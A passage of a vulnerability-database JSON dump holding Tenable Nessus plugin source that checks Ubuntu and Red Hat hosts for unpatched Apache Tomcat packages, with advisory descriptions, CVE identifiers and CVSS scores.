service.\n(CVE-2019-10072).\n\nNote that Tenable Network Security has extracted the preceding\ndescription block directly from the Ubuntu security advisory. Tenable\nhas attempted to automatically clean and format it as much as possible\nwithout introducing additional issues.\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://usn.ubuntu.com/4128-2/\"\n );\n script_set_attribute(\n attribute:\"solution\",\n value:\"Update the affected libtomcat9-java and / or tomcat9 packages.\"\n );\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:M/Au:N/C:N/I:P/A:N\");\n script_set_cvss_temporal_vector(\"CVSS2#E:H/RL:OF/RC:C\");\n script_set_cvss3_base_vector(\"CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N\");\n script_set_cvss3_temporal_vector(\"CVSS:3.0/E:H/RL:O/RC:C\");\n script_set_attribute(attribute:\"cvss_score_source\", value:\"CVE-2019-0221\");\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n script_set_attribute(attribute:\"exploited_by_malware\", value:\"true\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:canonical:ubuntu_linux:libtomcat9-java\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:canonical:ubuntu_linux:tomcat9\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:canonical:ubuntu_linux:18.04:-:lts\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:canonical:ubuntu_linux:19.04\");\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2019/04/10\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2019/09/18\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2019/09/19\");\n script_set_attribute(attribute:\"generated_plugin\", value:\"current\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_copyright(english:\"Ubuntu Security Notice (C) 2019-2023 Canonical, Inc. / NASL script (C) 2019-2023 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n script_family(english:\"Ubuntu Local Security Checks\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/cpu\", \"Host/Ubuntu\", \"Host/Ubuntu/release\", \"Host/Debian/dpkg-l\");\n\n exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"ubuntu.inc\");\ninclude(\"misc_func.inc\");\n\nif ( ! get_kb_item(\"Host/local_checks_enabled\") ) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nrelease = get_kb_item(\"Host/Ubuntu/release\");\nif ( isnull(release) ) audit(AUDIT_OS_NOT, \"Ubuntu\");\nvar release = chomp(release);\nif (! preg(pattern:\"^(18\\.04|19\\.04)$\", string:release)) audit(AUDIT_OS_NOT, \"Ubuntu 18.04 / 19.04\", \"Ubuntu \" + release);\nif ( ! get_kb_item(\"Host/Debian/dpkg-l\") ) audit(AUDIT_PACKAGE_LIST_MISSING);\n\nvar cpu = get_kb_item(\"Host/cpu\");\nif (isnull(cpu)) audit(AUDIT_UNKNOWN_ARCH);\nif ('x86_64' >!< cpu && cpu !~ \"^i[3-6]86$\" && 's390' >!< cpu && 'aarch64' >!< cpu) audit(AUDIT_LOCAL_CHECKS_NOT_IMPLEMENTED, 'Ubuntu', cpu);\n\nvar flag = 0;\n\nif (ubuntu_check(osver:\"18.04\", pkgname:\"libtomcat9-java\", pkgver:\"9.0.16-3ubuntu0.18.04.1\")) flag++;\nif (ubuntu_check(osver:\"18.04\", pkgname:\"tomcat9\", pkgver:\"9.0.16-3ubuntu0.18.04.1\")) flag++;\nif (ubuntu_check(osver:\"19.04\", pkgname:\"libtomcat9-java\", pkgver:\"9.0.16-3ubuntu0.19.04.1\")) flag++;\nif (ubuntu_check(osver:\"19.04\", pkgname:\"tomcat9\", pkgver:\"9.0.16-3ubuntu0.19.04.1\")) flag++;\n\nif (flag)\n{\n security_report_v4(\n port : 0,\n severity : SECURITY_WARNING,\n extra : ubuntu_report_get()\n );\n exit(0);\n}\nelse\n{\n var tested = ubuntu_pkg_tests_get();\n if (tested) audit(AUDIT_PACKAGE_NOT_AFFECTED, tested);\n else audit(AUDIT_PACKAGE_NOT_INSTALLED, \"libtomcat9-java / tomcat9\");\n}\n", "cvss": {"score": 5.0, "vector": "AV:N/AC:L/Au:N/C:N/I:N/A:P"}}, {"lastseen": "2023-01-26T14:36:17", "description": "The remote Redhat Enterprise Linux 6 / 7 host has packages installed that are affected by multiple vulnerabilities as referenced in the RHSA-2020:0861 advisory.\n\n - tomcat: XSS in SSI printenv (CVE-2019-0221)\n\n - tomcat: local privilege escalation (CVE-2019-12418)\n\n - tomcat: Session fixation when using FORM authentication (CVE-2019-17563)\n\n - tomcat: Apache Tomcat AJP File Read/Inclusion Vulnerability (CVE-2020-1938)\n\nNote that Nessus has not tested for these issues but has instead relied only on the application's self-reported version number.", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 9.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2020-03-18T00:00:00", "type": "nessus", "title": "RHEL 6 / 7 : Red Hat JBoss Web Server 3.1 Service Pack 8 (RHSA-2020:0861)", "bulletinFamily": "scanner", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2019-0221", "CVE-2019-12418", "CVE-2019-17563", "CVE-2020-1938"], "modified": "2023-01-23T00:00:00", "cpe": ["cpe:2.3:o:redhat:enterprise_linux:6:*:*:*:*:*:*:*", "cpe:2.3:o:redhat:enterprise_linux:7:*:*:*:*:*:*:*", "p-cpe:2.3:a:redhat:enterprise_linux:tomcat7:*:*:*:*:*:*:*", "p-cpe:2.3:a:redhat:enterprise_linux:tomcat7-admin-webapps:*:*:*:*:*:*:*", "p-cpe:2.3:a:redhat:enterprise_linux:tomcat7-docs-webapp:*:*:*:*:*:*:*", "p-cpe:2.3:a:redhat:enterprise_linux:tomcat7-el-2.2-api:*:*:*:*:*:*:*", "p-cpe:2.3:a:redhat:enterprise_linux:tomcat7-javadoc:*:*:*:*:*:*:*", "p-cpe:2.3:a:redhat:enterprise_linux:tomcat7-jsp-2.2-api:*:*:*:*:*:*:*", "p-cpe:2.3:a:redhat:enterprise_linux:tomcat7-lib:*:*:*:*:*:*:*", "p-cpe:2.3:a:redhat:enterprise_linux:tomcat7-log4j:*:*:*:*:*:*:*", "p-cpe:2.3:a:redhat:enterprise_linux:tomcat7-servlet-3.0-api:*:*:*:*:*:*:*", "p-cpe:2.3:a:redhat:enterprise_linux:tomcat7-webapps:*:*:*:*:*:*:*", "p-cpe:2.3:a:redhat:enterprise_linux:tomcat8:*:*:*:*:*:*:*", "p-cpe:2.3:a:redhat:enterprise_linux:tomcat8-admin-webapps:*:*:*:*:*:*:*", "p-cpe:2.3:a:redhat:enterprise_linux:tomcat8-docs-webapp:*:*:*:*:*:*:*", "p-cpe:2.3:a:redhat:enterprise_linux:tomcat8-el-2.2-api:*:*:*:*:*:*:*", "p-cpe:2.3:a:redhat:enterprise_linux:tomcat8-javadoc:*:*:*:*:*:*:*", "p-cpe:2.3:a:redhat:enterprise_linux:tomcat8-jsp-2.3-api:*:*:*:*:*:*:*", "p-cpe:2.3:a:redhat:enterprise_linux:tomcat8-lib:*:*:*:*:*:*:*", "p-cpe:2.3:a:redhat:enterprise_linux:tomcat8-log4j:*:*:*:*:*:*:*", "p-cpe:2.3:a:redhat:enterprise_linux:tomcat8-servlet-3.1-api:*:*:*:*:*:*:*", "p-cpe:2.3:a:redhat:enterprise_linux:tomcat8-webapps:*:*:*:*:*:*:*", "p-cpe:2.3:a:redhat:enterprise_linux:tomcat-native:*:*:*:*:*:*:*", "p-cpe:2.3:a:redhat:enterprise_linux:tomcat7-jsvc:*:*:*:*:*:*:*", "p-cpe:2.3:a:redhat:enterprise_linux:tomcat7-selinux:*:*:*:*:*:*:*", "p-cpe:2.3:a:redhat:enterprise_linux:tomcat8-jsvc:*:*:*:*:*:*:*", "p-cpe:2.3:a:redhat:enterprise_linux:tomcat8-selinux:*:*:*:*:*:*:*"], "id": "REDHAT-RHSA-2020-0861.NASL", "href": "https://www.tenable.com/plugins/nessus/134668", "sourceData": "##\n# (C) Tenable, Inc.\n#\n# The descriptive text and package checks in this plugin were\n# extracted from Red Hat Security Advisory RHSA-2020:0861. The text\n# itself is copyright (C) Red Hat, Inc.\n##\n\ninclude('compat.inc');\n\nif (description)\n{\n script_id(134668);\n script_version(\"1.11\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2023/01/23\");\n\n script_cve_id(\n \"CVE-2019-0221\",\n \"CVE-2019-12418\",\n \"CVE-2019-17563\",\n \"CVE-2020-1938\"\n );\n script_bugtraq_id(108545);\n script_xref(name:\"RHSA\", value:\"2020:0861\");\n script_xref(name:\"IAVB\", value:\"2020-B-0010-S\");\n script_xref(name:\"IAVB\", value:\"2019-B-0048-S\");\n script_xref(name:\"CISA-KNOWN-EXPLOITED\", value:\"2022/03/17\");\n script_xref(name:\"IAVA\", value:\"2021-A-0196\");\n script_xref(name:\"CEA-ID\", value:\"CEA-2021-0004\");\n script_xref(name:\"CEA-ID\", value:\"CEA-2021-0025\");\n script_xref(name:\"CEA-ID\", value:\"CEA-2020-0021\");\n\n script_name(english:\"RHEL 6 / 7 : Red Hat JBoss Web Server 3.1 Service Pack 8 (RHSA-2020:0861)\");\n\n script_set_attribute(attribute:\"synopsis\", value:\n\"The remote Red Hat host is missing one or more security updates.\");\n script_set_attribute(attribute:\"description\", value:\n\"The remote Redhat Enterprise Linux 6 / 7 host has packages installed that are affected by multiple vulnerabilities as\nreferenced in the RHSA-2020:0861 advisory.\n\n - tomcat: XSS in SSI printenv (CVE-2019-0221)\n\n - tomcat: local privilege escalation (CVE-2019-12418)\n\n - tomcat: Session fixation when using FORM authentication (CVE-2019-17563)\n\n - tomcat: Apache Tomcat AJP File Read/Inclusion Vulnerability (CVE-2020-1938)\n\nNote that Nessus has not tested for these issues but has instead relied only on the application's self-reported version\nnumber.\");\n script_set_attribute(attribute:\"see_also\", value:\"https://access.redhat.com/security/cve/CVE-2019-0221\");\n script_set_attribute(attribute:\"see_also\", value:\"https://access.redhat.com/security/cve/CVE-2019-12418\");\n script_set_attribute(attribute:\"see_also\", value:\"https://access.redhat.com/security/cve/CVE-2019-17563\");\n script_set_attribute(attribute:\"see_also\", value:\"https://access.redhat.com/security/cve/CVE-2020-1938\");\n script_set_attribute(attribute:\"see_also\", value:\"https://access.redhat.com/errata/RHSA-2020:0861\");\n script_set_attribute(attribute:\"see_also\", value:\"https://bugzilla.redhat.com/1713275\");\n script_set_attribute(attribute:\"see_also\", value:\"https://bugzilla.redhat.com/1785699\");\n script_set_attribute(attribute:\"see_also\", value:\"https://bugzilla.redhat.com/1785711\");\n script_set_attribute(attribute:\"see_also\", value:\"https://bugzilla.redhat.com/1806398\");\n script_set_attribute(attribute:\"solution\", value:\n\"Update the affected packages.\");\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:L/Au:N/C:P/I:P/A:P\");\n script_set_cvss_temporal_vector(\"CVSS2#E:H/RL:OF/RC:C\");\n script_set_cvss3_base_vector(\"CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H\");\n script_set_cvss3_temporal_vector(\"CVSS:3.0/E:H/RL:O/RC:C\");\n script_set_attribute(attribute:\"cvss_score_source\", value:\"CVE-2020-1938\");\n\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n script_set_attribute(attribute:\"exploited_by_malware\", value:\"true\");\n script_cwe_id(79, 284, 285, 384);\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2019/04/13\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2020/03/17\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2020/03/18\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:redhat:enterprise_linux:6\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:redhat:enterprise_linux:7\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:tomcat-native\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:tomcat7\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:tomcat7-admin-webapps\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:tomcat7-docs-webapp\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:tomcat7-el-2.2-api\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:tomcat7-javadoc\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:tomcat7-jsp-2.2-api\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:tomcat7-jsvc\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:tomcat7-lib\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:tomcat7-log4j\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:tomcat7-selinux\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:tomcat7-servlet-3.0-api\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:tomcat7-webapps\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:tomcat8\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:tomcat8-admin-webapps\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:tomcat8-docs-webapp\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:tomcat8-el-2.2-api\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:tomcat8-javadoc\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:tomcat8-jsp-2.3-api\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:tomcat8-jsvc\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:tomcat8-lib\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:tomcat8-log4j\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:tomcat8-selinux\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:tomcat8-servlet-3.1-api\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:tomcat8-webapps\");\n script_set_attribute(attribute:\"generated_plugin\", value:\"current\");\n script_set_attribute(attribute:\"stig_severity\", value:\"I\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_family(english:\"Red Hat Local Security Checks\");\n\n script_copyright(english:\"This script is Copyright (C) 2020-2023 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n\n script_dependencies(\"ssh_get_info.nasl\", \"redhat_repos.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/RedHat/release\", \"Host/RedHat/rpm-list\", \"Host/cpu\");\n\n exit(0);\n}\n\n\ninclude('rpm.inc');\ninclude('rhel.inc');\n\nif (!get_kb_item('Host/local_checks_enabled')) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nvar os_release = get_kb_item('Host/RedHat/release');\nif (isnull(os_release) || 'Red Hat' >!< os_release) audit(AUDIT_OS_NOT, 'Red Hat');\nvar os_ver = pregmatch(pattern: \"Red Hat Enterprise Linux.*release ([0-9]+(\\.[0-9]+)?)\", string:os_release);\nif (isnull(os_ver)) audit(AUDIT_UNKNOWN_APP_VER, 'Red Hat');\nos_ver = os_ver[1];\nif (!rhel_check_release_list(operator: 'ge', os_version: os_ver, rhel_versions: ['6','7'])) audit(AUDIT_OS_NOT, 'Red Hat 6.x / 7.x', 'Red Hat ' + os_ver);\n\nif (!get_kb_item('Host/RedHat/rpm-list')) audit(AUDIT_PACKAGE_LIST_MISSING);\n\nvar cpu = get_kb_item('Host/cpu');\nif (isnull(cpu)) audit(AUDIT_UNKNOWN_ARCH);\nif ('x86_64' >!< cpu && cpu !~ \"^i[3-6]86$\" && 's390' >!< cpu && 'aarch64' >!< cpu) audit(AUDIT_LOCAL_CHECKS_NOT_IMPLEMENTED, 'Red Hat', cpu);\n\nvar constraints = [\n {\n 'repo_relative_urls': [\n 'content/dist/rhel/server/6/6Server/i386/jws/3/debug',\n 'content/dist/rhel/server/6/6Server/i386/jws/3/os',\n 'content/dist/rhel/server/6/6Server/i386/jws/3/source/SRPMS',\n 'content/dist/rhel/server/6/6Server/x86_64/jws/3/debug',\n 'content/dist/rhel/server/6/6Server/x86_64/jws/3/os',\n 'content/dist/rhel/server/6/6Server/x86_64/jws/3/source/SRPMS'\n ],\n 'pkgs': [\n {'reference':'tomcat-native-1.2.23-21.redhat_21.ep7.el6', 'cpu':'i686', 'release':'6', 'rpm_spec_vers_cmp':TRUE, 'exists_check':'jws-3'},\n {'reference':'tomcat-native-1.2.23-21.redhat_21.ep7.el6', 'cpu':'x86_64', 'release':'6', 'rpm_spec_vers_cmp':TRUE, 'exists_check':'jws-3'},\n {'reference':'tomcat7-7.0.70-38.ep7.el6', 'release':'6', 'rpm_spec_vers_cmp':TRUE, 'exists_check':'jws-3'},\n {'reference':'tomcat7-admin-webapps-7.0.70-38.ep7.el6', 'release':'6', 'rpm_spec_vers_cmp':TRUE, 'exists_check':'jws-3'},\n {'reference':'tomcat7-docs-webapp-7.0.70-38.ep7.el6', 'release':'6', 'rpm_spec_vers_cmp':TRUE, 'exists_check':'jws-3'},\n {'reference':'tomcat7-el-2.2-api-7.0.70-38.ep7.el6', 'release':'6', 'rpm_spec_vers_cmp':TRUE, 'exists_check':'jws-3'},\n {'reference':'tomcat7-javadoc-7.0.70-38.ep7.el6', 'release':'6', 'rpm_spec_vers_cmp':TRUE, 'exists_check':'jws-3'},\n {'reference':'tomcat7-jsp-2.2-api-7.0.70-38.ep7.el6', 'release':'6', 'rpm_spec_vers_cmp':TRUE, 'exists_check':'jws-3'},\n {'reference':'tomcat7-jsvc-7.0.70-38.ep7.el6', 'release':'6', 'rpm_spec_vers_cmp':TRUE, 'exists_check':'jws-3'},\n {'reference':'tomcat7-lib-7.0.70-38.ep7.el6', 'release':'6', 'rpm_spec_vers_cmp':TRUE, 'exists_check':'jws-3'},\n {'reference':'tomcat7-log4j-7.0.70-38.ep7.el6', 'release':'6', 'rpm_spec_vers_cmp':TRUE, 'exists_check':'jws-3'},\n {'reference':'tomcat7-selinux-7.0.70-38.ep7.el6', 'release':'6', 'rpm_spec_vers_cmp':TRUE, 'exists_check':'jws-3'},\n {'reference':'tomcat7-servlet-3.0-api-7.0.70-38.ep7.el6', 'release':'6', 'rpm_spec_vers_cmp':TRUE, 'exists_check':'jws-3'},\n {'reference':'tomcat7-webapps-7.0.70-38.ep7.el6', 'release':'6', 'rpm_spec_vers_cmp':TRUE, 'exists_check':'jws-3'},\n {'reference':'tomcat8-8.0.36-42.ep7.el6', 'release':'6', 'rpm_spec_vers_cmp':TRUE, 'exists_check':'jws-3'},\n {'reference':'tomcat8-admin-webapps-8.0.36-42.ep7.el6', 'release':'6', 'rpm_spec_vers_cmp':TRUE, 'exists_check':'jws-3'},\n {'reference':'tomcat8-docs-webapp-8.0.36-42.ep7.el6', 'release':'6', 'rpm_spec_vers_cmp':TRUE, 'exists_check':'jws-3'},\n {'reference':'tomcat8-el-2.2-api-8.0.36-42.ep7.el6', 'release':'6', 'rpm_spec_vers_cmp':TRUE, 'exists_check':'jws-3'},\n {'reference':'tomcat8-javadoc-8.0.36-42.ep7.el6', 'release':'6', 'rpm_spec_vers_cmp':TRUE, 'exists_check':'jws-3'},\n {'reference':'tomcat8-jsp-2.3-api-8.0.36-42.ep7.el6', 'release':'6', 'rpm_spec_vers_cmp':TRUE, 'exists_check':'jws-3'},\n {'reference':'tomcat8-jsvc-8.0.36-42.ep7.el6', 'release':'6', 'rpm_spec_vers_cmp':TRUE, 'exists_check':'jws-3'},\n {'reference':'tomcat8-lib-8.0.36-42.ep7.el6', 'release':'6', 'rpm_spec_vers_cmp':TRUE, 'exists_check':'jws-3'},\n {'reference':'tomcat8-log4j-8.0.36-42.ep7.el6', 'release':'6', 'rpm_spec_vers_cmp':TRUE, 'exists_check':'jws-3'},\n {'reference':'tomcat8-selinux-8.0.36-42.ep7.el6', 'release':'6', 'rpm_spec_vers_cmp':TRUE, 'exists_check':'jws-3'},\n {'reference':'tomcat8-servlet-3.1-api-8.0.36-42.ep7.el6', 'release':'6', 'rpm_spec_vers_cmp':TRUE, 'exists_check':'jws-3'},\n {'reference':'tomcat8-webapps-8.0.36-42.ep7.el6', 'release':'6', 'rpm_spec_vers_cmp':TRUE, 'exists_check':'jws-3'}\n ]\n },\n {\n 'repo_relative_urls': [\n 'content/dist/rhel/server/7/7Server/x86_64/jws/3/debug',\n 'content/dist/rhel/server/7/7Server/x86_64/jws/3/os',\n 'content/dist/rhel/server/7/7Server/x86_64/jws/3/source/SRPMS'\n ],\n 'pkgs': [\n {'reference':'tomcat-native-1.2.23-21.redhat_21.ep7.el7', 'cpu':'x86_64', 'release':'7', 'rpm_spec_vers_cmp':TRUE, 'exists_check':'jws-3'},\n {'reference':'tomcat7-7.0.70-38.ep7.el7', 'release':'7', 'rpm_spec_vers_cmp':TRUE, 'exists_check':'jws-3'},\n {'reference':'tomcat7-admin-webapps-7.0.70-38.ep7.el7', 'release':'7', 'rpm_spec_vers_cmp':TRUE, 'exists_check':'jws-3'},\n {'reference':'tomcat7-docs-webapp-7.0.70-38.ep7.el7', 'release':'7', 'rpm_spec_vers_cmp':TRUE, 'exists_check':'jws-3'},\n {'reference':'tomcat7-el-2.2-api-7.0.70-38.ep7.el7', 'release':'7', 'rpm_spec_vers_cmp':TRUE, 'exists_check':'jws-3'},\n {'reference':'tomcat7-javadoc-7.0.70-38.ep7.el7', 'release':'7', 'rpm_spec_vers_cmp':TRUE, 'exists_check':'jws-3'},\n {'reference':'tomcat7-jsp-2.2-api-7.0.70-38.ep7.el7', 'release':'7', 'rpm_spec_vers_cmp':TRUE, 'exists_check':'jws-3'},\n {'reference':'tomcat7-jsvc-7.0.70-38.ep7.el7', 'release':'7', 'rpm_spec_vers_cmp':TRUE, 'exists_check':'jws-3'},\n {'reference':'tomcat7-lib-7.0.70-38.ep7.el7', 'release':'7', 'rpm_spec_vers_cmp':TRUE, 'exists_check':'jws-3'},\n {'reference':'tomcat7-log4j-7.0.70-38.ep7.el7', 'release':'7', 'rpm_spec_vers_cmp':TRUE, 'exists_check':'jws-3'},\n {'reference':'tomcat7-selinux-7.0.70-38.ep7.el7', 'release':'7', 'rpm_spec_vers_cmp':TRUE, 'exists_check':'jws-3'},\n {'reference':'tomcat7-servlet-3.0-api-7.0.70-38.ep7.el7', 'release':'7', 'rpm_spec_vers_cmp':TRUE, 'exists_check':'jws-3'},\n {'reference':'tomcat7-webapps-7.0.70-38.ep7.el7', 'release':'7', 'rpm_spec_vers_cmp':TRUE, 'exists_check':'jws-3'},\n {'reference':'tomcat8-8.0.36-42.ep7.el7', 'release':'7', 'rpm_spec_vers_cmp':TRUE, 'exists_check':'jws-3'},\n {'reference':'tomcat8-admin-webapps-8.0.36-42.ep7.el7', 'release':'7', 'rpm_spec_vers_cmp':TRUE, 'exists_check':'jws-3'},\n {'reference':'tomcat8-docs-webapp-8.0.36-42.ep7.el7', 'release':'7', 'rpm_spec_vers_cmp':TRUE, 'exists_check':'jws-3'},\n {'reference':'tomcat8-el-2.2-api-8.0.36-42.ep7.el7', 'release':'7', 'rpm_spec_vers_cmp':TRUE, 'exists_check':'jws-3'},\n {'reference':'tomcat8-javadoc-8.0.36-42.ep7.el7', 'release':'7', 'rpm_spec_vers_cmp':TRUE, 'exists_check':'jws-3'},\n {'reference':'tomcat8-jsp-2.3-api-8.0.36-42.ep7.el7', 'release':'7', 'rpm_spec_vers_cmp':TRUE, 'exists_check':'jws-3'},\n {'reference':'tomcat8-jsvc-8.0.36-42.ep7.el7', 'release':'7', 'rpm_spec_vers_cmp':TRUE, 'exists_check':'jws-3'},\n {'reference':'tomcat8-lib-8.0.36-42.ep7.el7', 'release':'7', 'rpm_spec_vers_cmp':TRUE, 'exists_check':'jws-3'},\n {'reference':'tomcat8-log4j-8.0.36-42.ep7.el7', 'release':'7', 'rpm_spec_vers_cmp':TRUE, 'exists_check':'jws-3'},\n {'reference':'tomcat8-selinux-8.0.36-42.ep7.el7', 'release':'7', 'rpm_spec_vers_cmp':TRUE, 'exists_check':'jws-3'},\n {'reference':'tomcat8-servlet-3.1-api-8.0.36-42.ep7.el7', 'release':'7', 'rpm_spec_vers_cmp':TRUE, 'exists_check':'jws-3'},\n {'reference':'tomcat8-webapps-8.0.36-42.ep7.el7', 'release':'7', 'rpm_spec_vers_cmp':TRUE, 'exists_check':'jws-3'}\n ]\n }\n];\n\nvar applicable_repo_urls = rhel_determine_applicable_repository_urls(constraints:constraints);\nif(applicable_repo_urls == RHEL_REPOS_NO_OVERLAP_MESSAGE) exit(0, RHEL_REPO_NOT_ENABLED);\n\nvar flag = 0;\nforeach var constraint_array ( constraints ) {\n var repo_relative_urls = NULL;\n if (!empty_or_null(constraint_array['repo_relative_urls'])) repo_relative_urls = constraint_array['repo_relative_urls'];\n foreach var pkg ( constraint_array['pkgs'] ) {\n var reference = NULL;\n var _release = NULL;\n var sp = NULL;\n var _cpu = NULL;\n var el_string = NULL;\n var rpm_spec_vers_cmp = NULL;\n var epoch = NULL;\n var allowmaj = NULL;\n var exists_check = NULL;\n if (!empty_or_null(pkg['reference'])) reference = pkg['reference'];\n if (!empty_or_null(pkg['release'])) _release = 'RHEL' + pkg['release'];\n if (!empty_or_null(pkg['sp'])) sp = pkg['sp'];\n if (!empty_or_null(pkg['cpu'])) _cpu = pkg['cpu'];\n if (!empty_or_null(pkg['el_string'])) el_string = pkg['el_string'];\n if (!empty_or_null(pkg['rpm_spec_vers_cmp'])) rpm_spec_vers_cmp = pkg['rpm_spec_vers_cmp'];\n if (!empty_or_null(pkg['epoch'])) epoch = pkg['epoch'];\n if (!empty_or_null(pkg['allowmaj'])) allowmaj = pkg['allowmaj'];\n if (!empty_or_null(pkg['exists_check'])) exists_check = pkg['exists_check'];\n if (reference &&\n _release &&\n rhel_decide_repo_relative_url_check(required_repo_url_list:repo_relative_urls) &&\n (applicable_repo_urls || (!exists_check || rpm_exists(release:_release, rpm:exists_check))) &&\n rpm_check(release:_release, sp:sp, cpu:_cpu, reference:reference, epoch:epoch, el_string:el_string, rpm_spec_vers_cmp:rpm_spec_vers_cmp, allowmaj:allowmaj)) flag++;\n }\n}\n\nif (flag)\n{\n var extra = NULL;\n if (empty_or_null(applicable_repo_urls)) extra = rpm_report_get() + redhat_report_repo_caveat();\n else extra = rpm_report_get() + redhat_report_package_caveat();\n security_report_v4(\n port : 0,\n severity : SECURITY_HOLE,\n extra : extra\n );\n exit(0);\n}\nelse\n{\n var tested = pkg_tests_get();\n if (tested) audit(AUDIT_PACKAGE_NOT_AFFECTED, tested);\n else audit(AUDIT_PACKAGE_NOT_INSTALLED, 'tomcat-native / tomcat7 / tomcat7-admin-webapps / tomcat7-docs-webapp / etc');\n}\n", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2023-01-22T14:30:00", "description": "The remote host is affected by the vulnerability described in GLSA-202003-43 (Apache Tomcat: Multiple vulnerabilities)\n\n Multiple vulnerabilities have been discovered in Apache Tomcat. Please review the CVE identifiers referenced below for details.\n Impact :\n\n An attacker could possibly smuggle HTTP requests or execute arbitrary code.\n Workaround :\n\n There is no known workaround at this time.", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 9.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2020-03-20T00:00:00", "type": "nessus", "title": "GLSA-202003-43 : Apache Tomcat: Multiple vulnerabilities", "bulletinFamily": "scanner", 